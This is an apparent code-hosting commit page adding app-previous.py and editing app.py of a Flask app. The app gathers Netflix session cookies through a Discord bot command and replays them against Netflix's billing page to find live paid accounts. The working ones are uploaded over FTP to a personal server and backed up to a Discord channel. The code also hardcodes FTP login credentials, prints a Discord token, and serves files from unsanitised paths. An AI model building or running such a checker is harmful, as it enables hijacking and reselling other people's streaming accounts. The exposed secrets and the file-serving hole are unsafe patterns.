Spaces: Running
Hashir Kashif committed
Commit · 141cbfe · 1 Parent(s): da3db29
editing99999990999asasdasdasdasasdasddasdasdasdasasd
Files changed:
- app-previous.py +293 -0
- app.py +2 -35
app-previous.py
ADDED
@@ -0,0 +1,293 @@
import re
import requests
from bs4 import BeautifulSoup
from deep_translator import GoogleTranslator
import glob
import os
import shutil
import string
import random
from flask import Flask, abort, send_file, render_template
from flask_autoindex import AutoIndex
from threading import Thread
import time
import json
from urllib.parse import unquote
from ftplib import FTP_TLS
os.remove("./cookies/test.txt")

class Unbuffered(object):
    def __init__(self, stream):
        self.stream = stream
    def write(self, data):
        self.stream.write(data)
        self.stream.flush()
    def writelines(self, datas):
        self.stream.writelines(datas)
        self.stream.flush()
    def __getattr__(self, attr):
        return getattr(self.stream, attr)
import sys
sys.stdout = Unbuffered(sys.stdout)


def send_retrieve_cookie_msg(channelid):
    print("getting cookie")
    secret = os.environ['DISCORD_CODE']
    print(secret)
    data = {"content": "c.gen netflix"}
    headers = {"authorization": secret}
    r = requests.post(
        "https://discord.com/api/v9/channels/1186365728278990938/messages",
        data=data,
        headers=headers)
    time.sleep(10)
    os.chdir("./cookies/")
    if r.status_code != 429:
        headers = {'authorization': secret}
        r = requests.get(
            f' https://discord.com/api/v9/channels/{channelid}/messages?limit=1',
            headers=headers)
        jsonn = json.loads(r.text)
        # n = 0

        for value in jsonn:
            # n = n + 1
            S = 6
            ran = ''.join(random.choices(string.ascii_uppercase + string.digits,
                                         k=S))
            # attachmentUrl = value['attachments'][0]
            try:
                attachmentUrl = value['attachments'][0]['url']
                filename = str(ran) + ".txt"
                response = requests.get(attachmentUrl)
                open("old" + filename, "wb").write(response.content)
                s = 1
                with open("old" + filename, 'r') as r, open(filename, 'w') as o:
                    for line in r:
                        # strip() function
                        if line.strip():
                            if (s == 1):
                                o.write("# Netscape HTTP Cookie File\n")
                                s = 2
                            o.write(line)
                os.remove("old" + filename)
            except Exception as e:
                print(e)
                pass
    else:
        print("cooldown")

    os.chdir("../")


def parseCookieFile(cookiefile):
    x = ""
    """Parse a cookies.txt file and return a dictionary of key value pairs
    compatible with requests."""

    cookies = {}
    with open(cookiefile, 'r') as fp:
        for line in fp:
            if not re.match(r'^\#', line):
                lineFields = line.strip().split('\t')
                try:
                    cookies[lineFields[5]] = lineFields[6]
                except:
                    print("Invalid cookie")
                    pass
    if x == "fail":
        return "fail"
    else:
        return cookies


def getNetflixInfo(cookiefile):
    cookies = parseCookieFile(cookiefile)
    # print(cookies)
    if cookies != "fail":

        r = requests.get("https://www.netflix.com/BillingActivity",
                         cookies=cookies)
        print(r.url)
        if "login" in r.url:
            print("Login Page")
            os.remove(cookiefile)
        else:
            soup = BeautifulSoup(r.content, "html.parser")
            try:
                print(r.url)
                billingDate = soup.find("div", {
                    "data-uia": "streaming-next-cycle"
                })
                print(billingDate)
                billingDate = billingDate.get_text()
                planName = soup.find("div", {"data-uia": "plan-name"})
                print(planName)
                planName = planName.get_text()
                billingDate = GoogleTranslator(source='auto',
                                               target='en').translate(billingDate)
                try:
                    lang = soup.find("html", {"lang": 'en'}).get_text()
                    lang = "English"
                except:
                    lang = ""
                    pass
                planName = GoogleTranslator(source='auto',
                                            target='en').translate(planName)

                print(billingDate + " " + planName + " " + lang)
                S = 3
                ran = ''.join(
                    random.choices(string.ascii_uppercase + string.digits, k=S))
                newCookiefile = "../Membership/" + billingDate + " " + planName + " " + lang + " (" + str(ran) + ").txt"
                shutil.move(
                    cookiefile, newCookiefile)
                # NOTE: only FTP_TLS is imported above, so ftplib.FTP raises NameError here;
                # this upload block is removed in the updated app.py below.
                session = ftplib.FTP('hashir672.serv00.net','f6857_hashir_serv00','Hashirisbest@1122')

                file = open(newCookiefile,'rb')  # file to send
                session.storbinary('STOR ./public_html/Membership/'+newCookiefile, file)  # send the file
                file.close()  # close file and FTP
                session.quit()
                os.remove(newCookiefile)


            except Exception as e:
                print(e)
                f = open("../Membership/error.txt", "a")
                f.write(str(e) + "\n\n")
                f.close()
                print("\n Moving in noMember")
                S = 10
                ran = ''.join(
                    random.choices(string.ascii_uppercase + string.digits, k=S))
                shutil.move(cookiefile, '../NoMembership/NoMember' + str(ran) + ".txt")
    else:
        os.remove(cookiefile)
        print("cookie removed")


def mainTask():
    print("running cookie retriever")
    send_retrieve_cookie_msg(1191381755731644418)
    time.sleep(5)
    print("running netflix checker")
    os.chdir('./cookies/')
    for fileName in glob.glob("*.txt"):
        print(fileName)
        getNetflixInfo(fileName)
    os.chdir('../')

def testTask():
    os.chdir('./cookietest/')
    getNetflixInfo("./cookie.txt")
    os.chdir("../")

def connect():
    ftp = FTP_TLS()
    ftp.debugging = 2
    ftp.connect('hashir672.serv00.net',21)
    ftp.login('f6857_hashir_serv00', 'Hashirisbest@1122')
    return ftp


def backupTask(location,filename):
    for file in glob.glob("./Membership/*.txt"):
        os.remove(file)
    print('1')
    session = connect()
    print("1")
    session.voidcmd("NOOP")
    session.cwd('./public_html/Membership')
    files = session.nlst()
    files.remove(".")
    files.remove("..")
    for file in files:
        # print(file)
        r = requests.get("https://hashir672.serv00.net/Membership/"+file)
        open("./Membership/"+file,"wb").write(r.content)
    session.quit()

    archived = shutil.make_archive('./'+filename, 'zip', location)
    header = {
        'authorization': os.environ['DISCORD_CODE'],
    }
    files = {
        "file" : ("./"+filename+".zip", open("./"+filename+".zip", 'rb'))
    }

    channel_id = "1193267345079156746"

    r = requests.post(f"https://discord.com/api/v9/channels/{channel_id}/messages", headers=header, files=files)

app = Flask(__name__)


@app.route('/', defaults={'req_path': ''})
@app.route('/<path:req_path>')
def dir_listing(req_path):
    BASE_DIR = './Membership'  # /var/task/api/Membership
    # Joining the base and the requested path
    abs_path = os.path.join(BASE_DIR, req_path)
    abs_path = unquote(abs_path)

    # Check if path is a file and serve
    if os.path.isfile(abs_path):
        return send_file(abs_path)

    # Return 404 if path doesn't exist
    if not os.path.exists(abs_path):
        return str(abs_path)
        # return abort(404)

    # Show directory contents
    files = os.listdir(abs_path)
    return render_template('files.html', files=files)


@app.route('/alive')
def alive():
    return "Keep Alive"


@app.route('/main')
def main():
    # thr = Thread(target=testTask)
    thr = Thread(target=mainTask)
    thr.start()
    # mainTask()
    return 'Hello from Flask!'

@app.route('/test')
def test():
    thr = Thread(target=testTask)
    # thr = Thread(target=mainTask)
    thr.start()
    # mainTask()
    return 'Hello from Flask! test'

@app.route('/backup')
def backup():
    thr = Thread(target=backupTask,args=("./Membership","backup",))
    # thr = Thread(target=mainTask)
    print("backup Start")
    thr.start()
    # mainTask()
    return 'Backup Started of Membership'

@app.route('/backupNoMembership')
def backupNoMembership():
    thr = Thread(target=backupTask,args=("./NoMembership","backupNoMembership",))
    # thr = Thread(target=mainTask)
    thr.start()
    # mainTask()
    return 'Backup Started of NoMembership'


ppath = "/"

AutoIndex(app, browse_root=ppath)
# app.run()
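For reference, the cookie files this script consumes are Netscape-format cookies.txt files: tab-separated lines whose sixth and seventh fields are the cookie name and value, which is why parseCookieFile reads lineFields[5] and lineFields[6] and why the rewritten attachments get a "# Netscape HTTP Cookie File" header. A minimal, self-contained sketch of that parsing step follows; the sample line is illustrative only and is not taken from the commit.

    # Sketch of the Netscape cookies.txt parsing done in parseCookieFile above.
    # The sample line is made up for illustration; real files arrive as Discord attachments.
    sample = ".netflix.com\tTRUE\t/\tTRUE\t1735689600\tNetflixId\tv%3Dexample"

    cookies = {}
    for line in sample.splitlines():
        if line.strip() and not line.startswith("#"):  # skip comments and blank lines
            fields = line.strip().split("\t")          # domain, flag, path, secure, expiry, name, value
            if len(fields) >= 7:
                cookies[fields[5]] = fields[6]         # name -> value, as requests expects

    print(cookies)  # {'NetflixId': 'v%3Dexample'}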
app.py
CHANGED
@@ -13,7 +13,6 @@ from threading import Thread
 import time
 import json
 from urllib.parse import unquote
-from ftplib import FTP_TLS
 os.remove("./cookies/test.txt")
 
 class Unbuffered(object):
@@ -142,17 +141,9 @@ def getNetflixInfo(cookiefile):
                 S = 3
                 ran = ''.join(
                     random.choices(string.ascii_uppercase + string.digits, k=S))
-                newCookiefile = "../Membership/" + billingDate + " " + planName + " " + lang + " (" + str(ran) + ").txt"
                 shutil.move(
-                    cookiefile, newCookiefile)
-                session = ftplib.FTP('hashir672.serv00.net','f6857_hashir_serv00','Hashirisbest@1122')
-
-                file = open(newCookiefile,'rb')  # file to send
-                session.storbinary('STOR ./public_html/Membership/'+newCookiefile, file)  # send the file
-                file.close()  # close file and FTP
-                session.quit()
-                os.remove(newCookiefile)
-
+                    cookiefile, "../Membership/" + billingDate + " " + planName + " " +
+                    lang + " (" + str(ran) + ").txt")
 
             except Exception as e:
                 print(e)
@@ -185,31 +176,7 @@ def testTask():
     getNetflixInfo("./cookie.txt")
     os.chdir("../")
 
-def connect():
-    ftp = FTP_TLS()
-    ftp.debugging = 2
-    ftp.connect('hashir672.serv00.net',21)
-    ftp.login('f6857_hashir_serv00', 'Hashirisbest@1122')
-    return ftp
-
-
 def backupTask(location,filename):
-    for file in glob.glob("./Membership/*.txt"):
-        os.remove(file)
-    print('1')
-    session = connect()
-    print("1")
-    session.voidcmd("NOOP")
-    session.cwd('./public_html/Membership')
-    files = session.nlst()
-    files.remove(".")
-    files.remove("..")
-    for file in files:
-        # print(file)
-        r = requests.get("https://hashir672.serv00.net/Membership/"+file)
-        open("./Membership/"+file,"wb").write(r.content)
-    session.quit()
-
     archived = shutil.make_archive('./'+filename, 'zip', location)
     header = {
         'authorization': os.environ['DISCORD_CODE'],